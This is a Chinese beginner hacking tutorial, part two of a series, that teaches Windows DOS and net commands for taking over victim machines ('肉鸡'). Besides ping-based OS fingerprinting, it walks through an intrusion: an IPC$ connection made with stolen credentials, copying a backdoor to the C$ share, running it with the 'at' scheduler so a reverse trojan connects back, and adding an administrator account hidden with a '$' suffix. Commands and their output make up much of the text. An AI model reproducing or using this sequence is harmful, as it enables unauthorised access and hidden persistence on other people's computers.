菜鸟入门版-DOS命令之二

它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:

                    C:\>type c:\boot.ini

                     [boot loader]
                     timeout=30
                     default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
                    [operating systems]
                     multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
                    /fastdetect

看出来没有?,我用的是XP系统.

这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.

ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
                               ping   ip
                               ping   网址

下面P的是本站:

C:\>ping www.hf110.com

Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.

net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接

net use \\肉鸡ip\ipc$ "密码"  /user:"用户名"

连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).

copy D:\systems.exe  \\肉鸡ip\c$   //这里它要开放共享,你才能上传.否则无法上传成功.

net time \\肉鸡ip   //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10

at  \\肉鸡ip  15:12  systems.exe   //在15:12分,运行systems.exe

在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.

net user
查看用户或新建一个用户.
这是在我电脑上的截图

C:\>net user

\\BILLGATES 的用户帐户

---------------------------------------------------------------------
Guest                    guest1                   HelpAssistant
SUPPORT_388945a0         yhkj
命令成功完成。

C:\>

上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456,  截图如下

C:\>net user setwell 123456 /add
命令成功完成。

C:\>net localgroup administrators setwell /add       //这条命令是加setwell为管理员
命令成功完成。                       

接下来我们再net user ,载图如下

C:\>net user

\\BILLGATES 的用户帐户

----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。

建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:

C:\>net user set$ 123456 /add
命令成功完成。

C:\>net localgroup administrators set$ /add
命令成功完成。                       

C:\>net user

\\BILLGATES 的用户帐户

-----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。

C:\>

看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:

C:\>net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。

C:\>

看到没有,我们看到set$这个用户了.

如果要删除用户用这个命令:

C:\>net user setwell /delete

net start
1.启动某些服务
比如:                net start telnet   //启动telnet服务

2.查看当前启动了什么服务.看看我的电脑启动了什么服务:

C:\>net start
已经启动以下 Windows 服务:

Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger

相关链接:

 菜鸟入门版-DOS命令之一

 菜鸟入门版-DOS命令之二

 菜鸟入门版-DOS命令之三